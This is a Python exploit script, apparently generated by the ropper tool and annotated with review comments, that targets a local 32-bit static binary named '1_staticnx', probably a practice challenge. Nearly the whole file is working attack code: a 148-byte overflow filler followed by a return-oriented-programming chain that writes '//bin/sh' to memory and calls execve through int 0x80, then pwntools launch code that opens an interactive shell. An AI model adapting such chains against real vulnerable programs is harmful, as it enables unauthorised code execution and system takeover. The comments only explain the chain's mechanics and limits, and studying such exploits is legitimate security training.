#!/usr/bin/env python
# Generated by ropper ropchain generator #
#
# Builds a return-oriented-programming (ROP) payload for the local 32-bit
# binary ../Downloads/1_staticnx: 148 filler bytes followed by a sequence of
# gadget addresses and immediate values that ends in an `int 0x80` system call.
#
# NOTE(review): every gadget and data address is IMAGE_BASE_0 plus a fixed
# offset, so the chain is only valid while the binary is mapped at exactly
# that base (a non-PIE build). A position-independent build under ASLR
# invalidates all of these constants.
# NOTE(review): 148 is presumably the distance from the overflowed buffer to
# the saved return address -- not verifiable from this listing. A stack
# protector (canary) in the target would presumably catch the overwrite first.
# NOTE(review): str literals are concatenated with struct.pack() output. That
# works on Python 2 only; on Python 3 pack() returns bytes and the first `+=`
# raises TypeError.
from pwn import *
from struct import pack

# Pack an integer as an unsigned int in native byte order (struct format 'I').
p = lambda x : pack('I', x)

# Load address the offsets below are relative to; hard-coded, see note above.
IMAGE_BASE_0 = 0x08048000 # ../Downloads/1_staticnx
# Turn an image-relative offset into a packed absolute address.
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

# Filler up to the first chain entry.
rop = 'A' * 148

# --- Write the 8-byte string "//bin/sh" at image offset 0xa7060 ---
# (0x080ef060 after rebasing; presumably a writable data region -- confirm.)
# Each half is popped into eax and stored through edx.
rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
rop += rebase_0(0x000a7060)
rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
rop += rebase_0(0x000a7064)
rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;

# --- Store a zero dword at offset 0xa7068, right after the string ---
# It terminates the string and is also the NULL that ecx/edx point at below.
rop += rebase_0(0x000013e3) # 0x080493e3: xor eax, eax; ret;
rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
rop += rebase_0(0x000a7068)
rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;

# --- Load the syscall argument registers ---
# ebx -> the string; ecx and edx -> the zero dword (an empty pointer array).
rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret;
rop += rebase_0(0x000a7060)
rop += rebase_0(0x0009afc9) # 0x080e2fc9: pop ecx; ret;
rop += rebase_0(0x000a7068)
rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
rop += rebase_0(0x000a7068)

# --- Set the syscall number and trap into the kernel ---
# eax is loaded with 0xfffffff5 and negated, giving 0x0b (11), which is
# execve in the i386 Linux int 0x80 ABI.
rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
rop += p(0xfffffff5)
rop += rebase_0(0x00019a07) # 0x08061a07: neg eax; ret;
rop += rebase_0(0x0002afa0) # 0x08072fa0: int 0x80; ret;
def main():
    """Start the local target binary and hand it the prebuilt payload.

    Spawns ../Downloads/1_staticnx through process() (presumably the
    pwntools helper pulled in by ``from pwn import *``), writes the
    module-level ``rop`` string to it, then switches to interactive mode.
    """
    # Named `target` rather than `p` so the module-level packing helper
    # `p` is not shadowed inside this function.
    target = process('../Downloads/1_staticnx')
    target.send(rop)
    target.interactive()


# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()